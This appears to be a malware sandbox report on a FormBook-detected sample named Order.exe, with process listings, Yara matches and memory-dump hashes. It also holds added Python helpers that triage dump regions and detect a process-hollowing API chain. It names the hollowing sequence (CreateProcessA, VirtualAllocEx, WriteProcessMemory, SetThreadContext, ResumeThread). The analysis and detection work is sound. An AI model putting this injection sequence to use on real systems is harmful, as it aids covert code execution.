                                                                                                                                  Imagebase:0xfe0000
                                                                                                                                  File size:433'152 bytes
                                                                                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:high
                                                                                                                                  Has exited:true

                                                                                                                                  Target ID:3
                                                                                                                                  Start time:02:01:03
                                                                                                                                  Start date:24/10/2024
                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                  File size:862'208 bytes
                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:high
                                                                                                                                  Has exited:true

                                                                                                                                  Target ID:4
                                                                                                                                  Start time:02:01:03
                                                                                                                                  Start date:24/10/2024
                                                                                                                                  Path:C:\Users\user\Desktop\Order.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:"C:\Users\user\Desktop\Order.exe"
                                                                                                                                  Imagebase:0x150000
                                                                                                                                  File size:814'592 bytes
                                                                                                                                  MD5 hash:879BFDCA45455CFE5B122B8AD287B393
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:low
                                                                                                                                  Has exited:true

                                                                                                                                  Target ID:5
                                                                                                                                  Start time:02:01:03
                                                                                                                                  Start date:24/10/2024
                                                                                                                                  Path:C:\Users\user\Desktop\Order.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:"C:\Users\user\Desktop\Order.exe"
                                                                                                                                  Imagebase:0xea0000
                                                                                                                                  File size:814'592 bytes
                                                                                                                                  MD5 hash:879BFDCA45455CFE5B122B8AD287B393
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.1904953976.0000000001880000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.1904953976.0000000001880000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.1904392039.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.1904392039.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.1906112434.0000000001D60000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.1906112434.0000000001D60000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                  Reputation:low
                                                                                                                                  Has exited:true

                                                                                                                                  Target ID:6
                                                                                                                                  Start time:02:01:06
                                                                                                                                  Start date:24/10/2024
                                                                                                                                  Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                  Imagebase:0x7ff693ab0000
                                                                                                                                  File size:496'640 bytes
                                                                                                                                  MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:false
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:high
                                                                                                                                  Has exited:true

                                                                                                                                  Target ID:7
                                                                                                                                  Start time:02:01:12
                                                                                                                                  Start date:24/10/2024
                                                                                                                                  Path:C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:"C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe"
                                                                                                                                  Imagebase:0x7d0000
                                                                                                                                  File size:140'800 bytes
                                                                                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                  Has elevated privileges:false
                                                                                                                                  Has administrator privileges:false
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4144094992.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.4144094992.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                                                                  Reputation:high
                                                                                                                                  Has exited:false

                                                                                                                                  Target ID:9
                                                                                                                                  Start time:02:01:14
                                                                                                                                  Start date:24/10/2024
                                                                                                                                  Path:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:"C:\Windows\SysWOW64\mshta.exe"
                                                                                                                                  Imagebase:0xfb0000
                                                                                                                                  File size:13'312 bytes
                                                                                                                                  MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                                                                                                                                  Has elevated privileges:false
                                                                                                                                  Has administrator privileges:false
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.4144193946.0000000003500000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.4144193946.0000000003500000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.4144156725.00000000034B0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.4144156725.00000000034B0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.4143227652.0000000000B80000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.4143227652.0000000000B80000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                  Reputation:moderate
                                                                                                                                  Has exited:false

                                                                                                                                  Target ID:11
                                                                                                                                  Start time:02:01:20
                                                                                                                                  Start date:24/10/2024
                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                  File size:862'208 bytes
                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:false
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:high
                                                                                                                                  Has exited:true

                                                                                                                                  Target ID:12
                                                                                                                                  Start time:02:01:27
                                                                                                                                  Start date:24/10/2024
                                                                                                                                  Path:C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:"C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe"
                                                                                                                                  Imagebase:0x7d0000
                                                                                                                                  File size:140'800 bytes
                                                                                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                  Has elevated privileges:false
                                                                                                                                  Has administrator privileges:false
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.4145802850.0000000004A60000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.4145802850.0000000004A60000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                  Reputation:high
                                                                                                                                  Has exited:false

                                                                                                                                  Target ID:13
                                                                                                                                  Start time:02:01:40
                                                                                                                                  Start date:24/10/2024
                                                                                                                                  Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                                                  Imagebase:0x7ff6bf500000
                                                                                                                                  File size:676'768 bytes
                                                                                                                                  MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                                  Has elevated privileges:false
                                                                                                                                  Has administrator privileges:false
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:high
                                                                                                                                  Has exited:true

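                                                                                                                                  The Yara matches in the process table above all point at memory-dump files whose names encode where the hit was found. The following Python is an added triage helper, not part of the Joe Sandbox report or tooling: it parses those `.sdmp` names and flags regions that are executable but not backed by a loaded image, which is what injected or unpacked code looks like. The first field being the Target ID (hex) and the fourth being the region base address is confirmed by the report itself (Target ID 12 appears as `0000000C`, and the Memory Dump Source entries give `Offset: 055A0000` for `...00000000055A0000...`). Treating the fifth field as the Win32 PAGE_* protection and the seventh as the MEMORY_BASIC_INFORMATION Type (MEM_PRIVATE/MEM_MAPPED/MEM_IMAGE) is an assumption that matches the values seen (0x40, 0x04, 0x20000, 0x40000); the remaining fields are left uninterpreted.

```python
"""Triage Joe Sandbox Yara-match memory-dump names (*.sdmp) for injected code.

Added example, not report tooling. Field layout of the dump name:
  <target_id>.<stage>.<unknown>.<base>.<protect>.<unknown>.<mem_type>.<unknown>.sdmp
target_id and base are confirmed by the report; protect/mem_type are assumed to be
the Windows PAGE_* protection and MEMORY_BASIC_INFORMATION.Type values.
"""
from collections import defaultdict
from dataclasses import dataclass

# Memory protection constants (winnt.h).
PAGE_READWRITE = 0x04
PAGE_WRITECOPY = 0x08
PAGE_EXECUTE = 0x10
PAGE_EXECUTE_READ = 0x20
PAGE_EXECUTE_READWRITE = 0x40
PAGE_EXECUTE_WRITECOPY = 0x80
PAGE_MODIFIERS = 0x100 | 0x200 | 0x400  # PAGE_GUARD, PAGE_NOCACHE, PAGE_WRITECOMBINE
EXECUTE_MASK = PAGE_EXECUTE | PAGE_EXECUTE_READ | PAGE_EXECUTE_READWRITE | PAGE_EXECUTE_WRITECOPY
WRITE_MASK = PAGE_READWRITE | PAGE_WRITECOPY | PAGE_EXECUTE_READWRITE | PAGE_EXECUTE_WRITECOPY

# MEMORY_BASIC_INFORMATION.Type values.
MEM_PRIVATE = 0x20000
MEM_MAPPED = 0x40000
MEM_IMAGE = 0x1000000

# Source strings copied from the Yara match rows of this report (each region
# appears twice because two rules hit it).
REPORT_SOURCES = [
    "00000007.00000002.4144094992.0000000002D40000.00000040.00000001.00040000.00000000.sdmp",
    "00000007.00000002.4144094992.0000000002D40000.00000040.00000001.00040000.00000000.sdmp",
    "00000009.00000002.4144193946.0000000003500000.00000004.00000800.00020000.00000000.sdmp",
    "00000009.00000002.4144193946.0000000003500000.00000004.00000800.00020000.00000000.sdmp",
    "00000009.00000002.4144156725.00000000034B0000.00000004.00000800.00020000.00000000.sdmp",
    "00000009.00000002.4144156725.00000000034B0000.00000004.00000800.00020000.00000000.sdmp",
    "00000009.00000002.4143227652.0000000000B80000.00000040.80000000.00040000.00000000.sdmp",
    "00000009.00000002.4143227652.0000000000B80000.00000040.80000000.00040000.00000000.sdmp",
    "0000000C.00000002.4145802850.0000000004A60000.00000040.80000000.00040000.00000000.sdmp",
    "0000000C.00000002.4145802850.0000000004A60000.00000040.80000000.00040000.00000000.sdmp",
]


@dataclass(frozen=True)
class DumpRegion:
    target_id: int
    stage: int
    base: int
    protect: int
    mem_type: int

    @property
    def executable(self) -> bool:
        return bool((self.protect & ~PAGE_MODIFIERS) & EXECUTE_MASK)

    @property
    def writable(self) -> bool:
        return bool((self.protect & ~PAGE_MODIFIERS) & WRITE_MASK)

    @property
    def image_backed(self) -> bool:
        return self.mem_type == MEM_IMAGE

    def is_suspicious(self) -> bool:
        # Executable code that is not a mapped PE image is either unpacked in
        # place or written there by another process.
        return self.executable and not self.image_backed


def parse_sdmp_name(name: str) -> DumpRegion:
    stem = name[:-5] if name.endswith(".sdmp") else name
    fields = stem.split(".")
    if len(fields) != 8:
        raise ValueError(f"unexpected sdmp name layout: {name!r}")
    return DumpRegion(
        target_id=int(fields[0], 16),
        stage=int(fields[1], 16),
        base=int(fields[3], 16),
        protect=int(fields[4], 16),
        mem_type=int(fields[6], 16),
    )


def triage(sources) -> dict:
    """Map Target ID -> sorted base addresses of suspicious regions (deduplicated)."""
    unique = {}
    for src in sources:
        region = parse_sdmp_name(src)
        unique[(region.target_id, region.base)] = region
    flagged = defaultdict(list)
    for region in unique.values():
        if region.is_suspicious():
            flagged[region.target_id].append(region.base)
    return {tid: sorted(bases) for tid, bases in sorted(flagged.items())}


if __name__ == "__main__":
    for tid, bases in triage(REPORT_SOURCES).items():
        print(f"Target {tid}: RWX/non-image regions at", ", ".join(hex(b) for b in bases))
```

                                                                                                                                  Run against this report's rows, the helper separates the two PAGE_READWRITE hits in mshta.exe (data, most likely the stealer's decrypted configuration or staging buffers) from the three PAGE_EXECUTE_READWRITE, non-image regions in Targets 7, 9 and 12, which are the ones worth pulling for unpacked-payload analysis.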

                                                                                                                                    Execution Graph

                                                                                                                                    Execution Coverage:10.1%
                                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                                    Signature Coverage:14.3%
                                                                                                                                    Total number of Nodes:203
                                                                                                                                    Total number of Limit Nodes:15
                                                                                                                                    execution_graph (interactive node/edge dump; the node identifiers are code addresses and the only readable content is the Windows API each cluster resolves to)
                                                                                                                                    • 0x00c1ad50 – 0x00c1d7c6 cluster: GetModuleHandleW, DuplicateHandle, GetCurrentProcess, GetCurrentThread, GetCurrentThreadId, CreateActCtxA
                                                                                                                                    • 0x07ac7360 – 0x07ac764c cluster: PostMessageW
                                                                                                                                    • 0x07ac4ed3 – 0x07ac6b2a cluster (same region as the 07AC0000 memory dump source below, based on PE: false): a dispatcher at 0x07ac5f20 / 0x07ac5f22 / 0x07ac5f51 (each annotated "12 API calls") fans out to stubs wrapping CreateProcessA (0x07ac491d, 0x07ac4928), VirtualAllocEx (0x07ac45d8, 0x07ac45e0), WriteProcessMemory (0x07ac4698, 0x07ac46a0), ReadProcessMemory (0x07ac4788, 0x07ac4790), Wow64SetThreadContext (0x07ac4501, 0x07ac4508) and ResumeThread (0x07ac4018, 0x07ac4020)
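                                                                                                                                    The API set resolved by the 0x07ac0000 cluster (CreateProcessA, VirtualAllocEx, WriteProcessMemory, Wow64SetThreadContext, ResumeThread) is the classic process-hollowing sequence, and the report's "Injects a PE file into a foreign processes" and "Modifies the context of a thread in another process" signatures are consistent with it. The following Python is an added example of how a detection engine correlates such a trace per target process, not code from Joe Sandbox or from the sample. The event format, the caller/target PIDs and the `CREATE_SUSPENDED` check are constructed assumptions: the execution graph shows which APIs are called but not their arguments, so the sample trace is illustrative and not recovered from the report.

```python
"""Stateful detection of a process-hollowing API sequence in a per-process trace.

Added example, not report tooling. Events are (caller_pid, api, target_pid, flags);
the trace below is constructed to mirror the API set seen in the execution graph.
"""
from collections import defaultdict
from dataclasses import dataclass

CREATE_SUSPENDED = 0x00000004  # dwCreationFlags bit, processthreadsapi.h


@dataclass(frozen=True)
class ApiEvent:
    caller_pid: int
    api: str
    target_pid: int      # process the handle argument refers to (new child for CreateProcess*)
    flags: int = 0       # dwCreationFlags for CreateProcess*, 0 otherwise


# Ordered stages of a hollowing chain; each stage lists the API names that satisfy it.
# Native equivalents are included so a direct-syscall variant still matches.
STAGES = (
    ("create_suspended", {"CreateProcessA", "CreateProcessW"}),
    ("alloc_remote", {"VirtualAllocEx", "NtAllocateVirtualMemory"}),
    ("write_remote", {"WriteProcessMemory", "NtWriteVirtualMemory"}),
    ("set_context", {"Wow64SetThreadContext", "SetThreadContext", "NtSetContextThread"}),
    ("resume", {"ResumeThread", "NtResumeThread"}),
)


def detect_hollowing(events) -> list:
    """Return the sorted target PIDs for which every stage was observed in order.

    Unrelated calls (ReadProcessMemory, repeated writes once the write stage is
    satisfied) are ignored rather than resetting the state machine, because the
    real chain interleaves them freely.
    """
    progress = defaultdict(int)  # target_pid -> index of the next expected stage
    for ev in events:
        idx = progress[ev.target_pid]
        if idx >= len(STAGES):
            continue  # already a complete chain for this target
        name, apis = STAGES[idx]
        if ev.api not in apis:
            continue
        if name == "create_suspended" and not (ev.flags & CREATE_SUSPENDED):
            continue  # a normal child launch is not the start of a hollowing chain
        progress[ev.target_pid] = idx + 1
    return sorted(pid for pid, idx in progress.items() if idx == len(STAGES))


# Constructed trace: a 32-bit loader (hypothetical PID 1234) hollowing child 5678.
SAMPLE_TRACE = [
    ApiEvent(1234, "CreateProcessA", 5678, CREATE_SUSPENDED),
    ApiEvent(1234, "ReadProcessMemory", 5678),          # reads PEB to find the image base
    ApiEvent(1234, "VirtualAllocEx", 5678),
    ApiEvent(1234, "WriteProcessMemory", 5678),         # headers
    ApiEvent(1234, "WriteProcessMemory", 5678),         # sections
    ApiEvent(1234, "WriteProcessMemory", 5678),         # patched image base in PEB
    ApiEvent(1234, "Wow64SetThreadContext", 5678),      # redirect entry point
    ApiEvent(1234, "ResumeThread", 5678),
]

# Constructed benign traces: a plain child launch, and a debugger-style suspend/inspect/resume.
BENIGN_TRACE = [
    ApiEvent(1234, "CreateProcessA", 9999, 0),
    ApiEvent(1234, "ResumeThread", 9999),
    ApiEvent(4321, "CreateProcessW", 8888, CREATE_SUSPENDED),
    ApiEvent(4321, "ReadProcessMemory", 8888),
    ApiEvent(4321, "ResumeThread", 8888),
]


if __name__ == "__main__":
    print("hollowed targets:", detect_hollowing(SAMPLE_TRACE))   # [5678]
    print("benign targets flagged:", detect_hollowing(BENIGN_TRACE))  # []
```

                                                                                                                                    The point of keying the state on the target handle's process rather than on the caller is visible in this report: the same API set is exercised against more than one child (Targets 7, 9 and 12), so a per-caller counter would merge them while a per-target chain fires once for each hollowed process.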

                                                                                                                                    Control-flow Graph

                                                                                                                                    control_flow_graph for the function at 0x055a74a0 – 0x055a84f6 (interactive basic-block edge list and executed/not-executed colouring omitted; the function calls 0x055a7408 repeatedly from its main blocks and ends with a call to either 0x055a8ed8 or 0x055a8ee8 before the epilogue at 0x055a84af)
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1757516014.00000000055A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055A0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_55a0000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: 4'^q$TJcq$Te^q$pbq$xbaq
                                                                                                                                    • API String ID: 0-2576840827
                                                                                                                                    • Opcode ID: cfd8b9cf967f94bd07a6f41ea402a690dc7c3426846ff4704bc23a2db73d82c4
                                                                                                                                    • Instruction ID: 05b413e8083f17f5991f7d51a73f72adf82738bc41d012e2965add6f5357becc
                                                                                                                                    • Opcode Fuzzy Hash: cfd8b9cf967f94bd07a6f41ea402a690dc7c3426846ff4704bc23a2db73d82c4
                                                                                                                                    • Instruction Fuzzy Hash: 79B2C375E002289FDB64CF69C984ADDBBB2FF89304F1581E5D509AB225DB31AE91CF40
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1762035548.0000000007AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AC0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_7ac0000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 3e6f68c798b142291667684cd42455da046ac46b06eaf2a8ecb240a701047e1e
                                                                                                                                    • Instruction ID: e1c38a4fd32796fe572b5a5ffa8e3515f81bd69ec54d5f5a52fa95e2e9fb0d90
                                                                                                                                    • Opcode Fuzzy Hash: 3e6f68c798b142291667684cd42455da046ac46b06eaf2a8ecb240a701047e1e
                                                                                                                                    • Instruction Fuzzy Hash: 1FE1DDB1B01604AFEB2ADB75C550BAEB7F6BFC9300F10446DE1569B291CB39E841CB52
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1757516014.00000000055A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055A0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_55a0000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: bc83dd776eb9f2af822ec0cfc500fd6f69e61a7b715571142797f2842806353c
                                                                                                                                    • Instruction ID: c88ed365d23921a623be888dbe7547602e02c4302d0123dc310f1f96ae314fa3
                                                                                                                                    • Opcode Fuzzy Hash: bc83dd776eb9f2af822ec0cfc500fd6f69e61a7b715571142797f2842806353c
                                                                                                                                    • Instruction Fuzzy Hash: CDD1E971D05228CFEB64DFA5C848BEEBBF2FB89300F1081AAE519A7241D7745985CF51
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1757516014.00000000055A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055A0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_55a0000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 8a8c72cb176916c32cc13f8d649196ad09d6d9c5d87a26307d3e85b4bcc60778
                                                                                                                                    • Instruction ID: d6dcf1fd27bd16b00fe5b747c7d75b56a4832b2eb823775fa96ce594c56ed8f1
                                                                                                                                    • Opcode Fuzzy Hash: 8a8c72cb176916c32cc13f8d649196ad09d6d9c5d87a26307d3e85b4bcc60778
                                                                                                                                    • Instruction Fuzzy Hash: 24D1E971D05228CFEB64DFA5C848BEEBBF2FB89300F1091AAE519A7240D7745985CF91
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1762035548.0000000007AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AC0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_7ac0000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 258c77b0079ca0d85e37b22535a6e07ea2e7d147c5d43360b4851ae8781607cf
                                                                                                                                    • Instruction ID: eb0ac848dfd1de144b509b8c744fd6f181a65502a1942e68df41af7665163a65
                                                                                                                                    • Opcode Fuzzy Hash: 258c77b0079ca0d85e37b22535a6e07ea2e7d147c5d43360b4851ae8781607cf
                                                                                                                                    • Instruction Fuzzy Hash: 7071F5B1D15229DBEB24CF66C8407E9BBB6AF8A300F10D1EAD41DA6254EB701AC5CF41
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1757516014.00000000055A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055A0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_55a0000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 9419a74bd8a2c3b2f356268a85105aef241e4fdb44b128db579ab11f6f60b6e5
                                                                                                                                    • Instruction ID: f230a72444cb3f0462c103666e3f01182556a4521c5664a9b7c30ef6a58fe493
                                                                                                                                    • Opcode Fuzzy Hash: 9419a74bd8a2c3b2f356268a85105aef241e4fdb44b128db579ab11f6f60b6e5
                                                                                                                                    • Instruction Fuzzy Hash: 9F61D0B1D04228CFDB24CFAAD8847DEBBF2BB89300F14D5AAD409A7251DB345986CF51
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1757516014.00000000055A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055A0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_55a0000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: a75130a7d797027eae2daa8e0bbb6d9e2990c0e14da020d8c5b7ffe545ee347b
                                                                                                                                    • Instruction ID: 807f27241dbb2f9ad5d9e43429d15ae7318c3e1a2b694bd17a10c02545c4366f
                                                                                                                                    • Opcode Fuzzy Hash: a75130a7d797027eae2daa8e0bbb6d9e2990c0e14da020d8c5b7ffe545ee347b
                                                                                                                                    • Instruction Fuzzy Hash: 2261BFB1D04228CFDB24CFAAD844BEEBBF2BB89300F14D5AAD409A7255DB345985CF51
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1757516014.00000000055A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055A0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_55a0000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: e0e4d986dbc69a24d46a327751dd626f6a5847b2c34daba18a2c2d63555a7a94
                                                                                                                                    • Instruction ID: 1c8de5052db015e07d23c00ed45d4374971fbc8c1e373d12b877f872e3c2f334
                                                                                                                                    • Opcode Fuzzy Hash: e0e4d986dbc69a24d46a327751dd626f6a5847b2c34daba18a2c2d63555a7a94
                                                                                                                                    • Instruction Fuzzy Hash: B351A1B6D0D2448FDB05CFA9E4452EDBFFABF8E300F1494AAE459A7292D7344941CB90
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1762035548.0000000007AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AC0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_7ac0000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: ee32ed3ec4a31d23dda4afd3dbd2949c8a02543944f001689a149832483fb777
                                                                                                                                    • Instruction ID: f495afdf6596749599d2c143943c178dc71056422bb5c62eaf66527c5b893ddd
                                                                                                                                    • Opcode Fuzzy Hash: ee32ed3ec4a31d23dda4afd3dbd2949c8a02543944f001689a149832483fb777
                                                                                                                                    • Instruction Fuzzy Hash: E731EBB1D056289AEB28CF66DD053DAFBF6AFC9305F04C1AAC41CA6255DB740A898F41

                                                                                                                                    Control-flow Graph (legend: Executed / Not Executed; basic-block edge dump omitted)
                                                                                                                                    APIs
                                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 00C1D566
                                                                                                                                    • GetCurrentThread.KERNEL32 ref: 00C1D5A3
                                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 00C1D5E0
                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00C1D639
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1736217895.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_c10000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Current$ProcessThread
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2063062207-0
                                                                                                                                    • Opcode ID: 97d71c2829f6d0c66f172b29fcb4e533e4323ff8edce11071aaef7d1e10a6f61
                                                                                                                                    • Instruction ID: f6fa5521225904e650e38685f6cef9910282e1a266fafb995cbe6fcd35d26309
                                                                                                                                    • Opcode Fuzzy Hash: 97d71c2829f6d0c66f172b29fcb4e533e4323ff8edce11071aaef7d1e10a6f61
                                                                                                                                    • Instruction Fuzzy Hash: 675146B0D043098FDB15DFA9D648BEEBBF2AF89304F208459E059A7360D7749984CF66

                                                                                                                                    Control-flow Graph (legend: Executed / Not Executed; basic-block edge dump omitted)
                                                                                                                                    APIs
                                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 00C1D566
                                                                                                                                    • GetCurrentThread.KERNEL32 ref: 00C1D5A3
